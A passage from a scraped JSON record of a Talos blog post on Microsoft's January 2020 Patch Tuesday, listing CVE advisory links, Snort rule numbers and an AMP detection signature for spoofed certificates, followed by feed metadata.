\n \nThe other important vulnerabilities are: \n\n\n * [CVE-2020-0602](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0602>)\n * [CVE-2020-0607](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0607>)\n * [CVE-2020-0608](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0608>)\n * [CVE-2020-0612](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0612>)\n * [CVE-2020-0613](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0613>)\n * [CVE-2020-0614](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0614>)\n * [CVE-2020-0615](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0615>)\n * [CVE-2020-0617](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0617>)\n * [CVE-2020-0620](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0620>)\n * [CVE-2020-0621](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0621>)\n * [CVE-2020-0622](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0622>)\n * [CVE-2020-0623](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0623>)\n * [CVE-2020-0624](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0624>)\n * [CVE-2020-0625](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0625>)\n * [CVE-2020-0626](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0626>)\n * [CVE-2020-0627](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0627>)\n * [CVE-2020-0628](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0628>)\n * [CVE-2020-0629](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0629>)\n * 
[CVE-2020-0630](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0630>)\n * [CVE-2020-0631](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0631>)\n * [CVE-2020-0632](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0632>)\n * [CVE-2020-0633](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0633>)\n * [CVE-2020-0634](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0634>)\n * [CVE-2020-0635](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0635>)\n * [CVE-2020-0636](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0636>)\n * [CVE-2020-0637](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0637>)\n * [CVE-2020-0638](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0638>)\n * [CVE-2020-0639](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0639>)\n * [CVE-2020-0641](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0641>)\n * [CVE-2020-0642](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0642>)\n * [CVE-2020-0643](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0643>)\n * [CVE-2020-0644](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0644>)\n * [CVE-2020-0647](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0647>)\n * [CVE-2020-0650](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0650>)\n * [CVE-2020-0651](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0651>)\n * [CVE-2020-0652](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0652>)\n * [CVE-2020-0653](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0653>)\n * 
[CVE-2020-0656](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0656>)\n\n### Coverage \n\nIn response to these vulnerability disclosures, Talos is releasing a new SNORT\u24c7 rule set that detects attempts to exploit some of them. Please note that additional rules may be released at a future date and current rules are subject to change pending additional information. Firepower customers should use the latest update to their ruleset by updating their SRU. Open Source Snort Subscriber Rule Set customers can stay up-to-date by downloading the latest rule pack available for purchase on Snort.org. \n \nThese rules are: 52593 - 52596, 52604, 52605 \n \n\n\n#### AMP Advanced Custom Detection (ACD) signature\n\n \nWhile there can be multiple ways that an attacker can exploit CVE-2020-0601, AMP can be used to detect spoofed certificates that are masquerading as a Microsoft ECC Certificate Authority by adding an advanced custom detection signature. The process to add this signature can be found in the [AMP documentation](<https://docs.amp.cisco.com/AMP%20for%20Endpoints%20User%20Guide.pdf>) on page 33 in the Outbreak Control section under custom detections. The actual custom signature that needs to be added can be downloaded [here](<https://blogs.cisco.com/cve-2020-0601-2>). \n\n", "modified": "2020-01-17T10:14:27", "published": "2020-01-17T10:14:27", "id": "TALOSBLOG:6A8FEAE9B7E20A5AA1A11907296891AF", "href": "http://feedproxy.google.com/~r/feedburner/Talos/~3/6XqA-qeq9Xs/microsoft-patch-tuesday-jan-2020.html", "type": "talosblog", "title": "Microsoft Patch Tuesday \u2014 Jan. 2020: Vulnerability disclosures and Snort coverage", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}]}